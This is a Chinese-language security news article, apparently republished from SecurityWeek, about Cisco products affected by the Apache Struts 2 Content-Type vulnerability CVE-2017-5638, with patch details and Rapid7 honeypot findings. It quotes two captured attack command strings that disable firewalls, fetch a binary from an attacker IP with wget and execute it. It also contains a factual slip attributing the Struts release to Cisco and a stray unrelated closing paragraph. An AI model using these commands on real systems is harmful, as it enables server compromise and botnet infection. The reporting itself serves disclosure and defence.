思科多款統一通信裝置存在Struts 2漏洞 美安全公司Rapid7稱捕獲了兩次來自中國的攻擊

經證明，該漏洞已影響到思科身份服務引擎（ise）、主要服務目錄虛拟裝置以及統一sip代理軟體。思科已公布了幾十個未受影響的産品清單，但很多産品仍在調查中。

network and content security devices

cisco identity services engine (ise)   cscvd49829

更新檔有效：1.2, 1.3, 1.4, and 2.x hot patches (18-march-2017)

network management and provisioning

cisco prime service catalog appliance and virtual appliance  cscvd49816

更新檔有效：

psc-patch-12.0.0-1 (13-march-2017) 

pscva-patch-12.0.0-1 (14-march-2017)

voice and unified communications devices

cisco emergency respondercscvd51442

cisco unified communications manager im & presence service (formerly cups)cscvd49842

cisco unified communications manager session management editioncscvd49840

cisco unified communications managercscvd49840

cisco unified contact center enterprisecscvd51210

cisco unified intelligent contact management enterprisecscvd51210

cisco unified sip proxy softwarecscvd49788

cisco unity connection

雖然漏洞被積極利用來傳播惡意軟體，思科尚未發現任何針對其産品攻擊的證據。盡管如此，該公司已警示使用者，該漏洞的利用程式是公開的。

struts 2.3.5至2.3.31和struts 2.5至2.5.10受到了該安全漏洞（cve-2017-5638）的影響。3月6日，思科釋出了struts 2.3.32和2.5.10.1。第一輪攻擊是在概念證明（poc）利用程式釋出後的一天内被發現的。

該漏洞存在于jakarta multipart parser分析器内，是因為對content-type頭值處理不當造成的。未經身份驗證的遠端攻擊者可利用該漏洞通過發送特制的http請求執行任意指令。

研究人員觀察到，漏洞利用程式的目标是确定脆弱系統和攻擊者試圖送出各種類型的惡意軟體（包括irc保镖和dos/ddos僵屍）的系統。

rapid7一直在監測攻擊，并根據蜜罐資料确認了大部分惡意流量來自位于中國的兩台機器。

第一次比對到的惡意請求是在 utc時間3月7日周二下午15:36 ，惡意請求來自中國鄭州的一台主機。 both were http get requests for /index.aciton (misspelled) and the commands that they executed would have caused a vulnerable target to download binaries from the attacking server. here is an example of the commands that were sent as a single string in the content-type value:

cd /dev/shm; wget http://xxx.xxx.xxx.92:92/lmydess; chmod 777 lmydess; ./lmydess;

之後惡意請求流量似乎停了，直到utc時間3月8日周四上午09:02，我們捕獲了一次來自中國上海主機的攻擊。 the requests differed from the previous attacks. the new attacks were http posts to a couple different paths and attempted to execute different commands on the victim:

/etc/init.d/iptables stop; service iptables stop; susefirewall2 stop; resusefirewall2 stop; cd /tmp; wget -c http://xxx.xxx.xxx.26:9/7; chmod 777 7; ./7;

rapid7是一家網際網路安全公司。2015 年 7 月，首次公開發行股票。年收入據稱超過1億美金。在 2016 年，他們推出新的産品insightidr。

獨立研究員matthew kienow和來自rapid7的tod beardsly、deral heiland分析了9個廠商的網絡管理系統，包括spiceworks、ipswitch、castle rock、manageengine、cloudview、paessler、opmantek、netikus和opsview。

原文釋出時間：2017年3月24日

本文由：securityweek 釋出，版權歸屬于原作者

原文連結：http://toutiao.secjia.com/cisco-unified-communications-devices-struts-2-vulnerability#

本文來自雲栖社群合作夥伴安全加，了解相關資訊可以關注安全加網站